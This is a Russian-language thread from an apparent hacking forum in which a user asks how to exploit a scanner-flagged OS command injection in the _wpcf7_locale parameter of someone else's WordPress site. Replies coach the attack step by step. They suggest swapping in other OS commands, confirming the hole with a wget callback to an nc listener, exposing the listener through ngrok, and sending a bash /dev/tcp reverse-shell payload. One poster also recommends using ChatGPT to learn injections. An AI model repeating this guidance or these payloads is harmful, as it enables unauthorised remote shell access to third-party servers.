• XSS.stack #1 – первый литературный журнал от юзеров форума

Внедрение удаленных команд ОС. Помощь

Jesus67

HDD-drive
Пользователь
Регистрация
11.06.2022
Сообщения
23
Реакции
3
На условном сайте site.com нашлась уязвимость указанная в шапке темы. Скан происходил утилитой ZAP. Параметр в zap указан _wpcf7_locale. Параметр атака «en_US’&sleep 15&’. Сколько я не копался так и не понял сути этой уязвимости. Сайт очень полезный во всех смыслах. Хотелось бы чуть больше информации о нем. Если кто крутится в этом, что-то знает или может подсказать/направить буду рад любой информации. Так же на сайте есть уязвимость «обхода пути» но там тоже ничего полезного не нашёл - (site.com/wp-json)
 
Обрати ванимание на en_US’&sleep 15&’
что происходит когда ты отправляешь это приложению ? пауза 15сек?

а что будет если паузу заменить другой OS командой?
Вникаешь ?:cool:
 
На условном сайте site.com нашлась уязвимость указанная в шапке темы. Скан происходил утилитой ZAP. Параметр в zap указан _wpcf7_locale. Параметр атака «en_US’&sleep 15&’. Сколько я не копался так и не понял сути этой уязвимости. Сайт очень полезный во всех смыслах. Хотелось бы чуть больше информации о нем. Если кто крутится в этом, что-то знает или может подсказать/направить буду рад любой информации. Так же на сайте есть уязвимость «обхода пути» но там тоже ничего полезного не нашёл - (site.com/wp-json)

"Нашлась" - это сканер определил как os inj или вы?
Если сканер и при передаче параметра "sleep" существует задержка(15 сек), то есть возможность выполнения команд, если нет, то скорее всего ложное срабатывание сканера и это просто метод общения со скриптом.
 
всем привет. Мои тысячекратные извинения перед вами. Как отправлять команды не знаю( уязвимость обнаружил сканер. Был бы очень рад конкретике или назвал бы сайт в лс
 
Пожалуйста, обратите внимание, что пользователь заблокирован
Спроси у чат жпт, я очень быстро научился проводить инъекции и раскручивать уязвимости с ним, 4 версия мне очень понравилась.
Не очень полагайтесь во всем подряд на ИИ. Ничего сильно полезнее обычного, но чуть более улучшенного поисковика такие штуковины не дают, и не дадут. Максимум-чуть большая плотность выдачи информации, и только. Все равно надо эти данные правильным образом систематизировать, как и при работе с обычными энциклопедиями. Да и мозги всегда должны работать, и человеческие мозги в любом случае работают лучше любого ИИ, действующего в контексте условностей которые заданы человеком алгоритмами, и всегда так будет. Хотя польза от его использования есть и она очевидна, в своей нише.
 
Последнее редактирование:
Пожалуйста, обратите внимание, что пользователь заблокирован
открой порт у себя на серве
сделай ченить типа аля wget http://ip:port/file
если увидишь чтото - то стоит задуматься...
ну можешь curl попробовать еще, или сразу пейлоад))))


nc -l -p 8080

'&wget http://serv:8080/fds&sleep 1&
ну допустим
 
На условном сайте site.com нашлась уязвимость указанная в шапке темы. Скан происходил утилитой ZAP. Параметр в zap указан _wpcf7_locale. Параметр атака «en_US’&sleep 15&’. Сколько я не копался так и не понял сути этой уязвимости. Сайт очень полезный во всех смыслах. Хотелось бы чуть больше информации о нем. Если кто крутится в этом, что-то знает или может подсказать/направить буду рад любой информации. Так же на сайте есть уязвимость «обхода пути» но там тоже ничего полезного не нашёл - (site.com/wp-json)
Что бы не ебаться с открытием портов, юзай Ngrok.
ngrok tcp 4444
nc -lvnp 4444
----------------
на уязвимом сайте кидаешь пейлоад
/bin/sh -i >& /dev/tcp/ip-ngrok/port-ngrok 0>&1 (Bash)
 


Напишите ответ...
  • Вставить:
Прикрепить файлы
Верх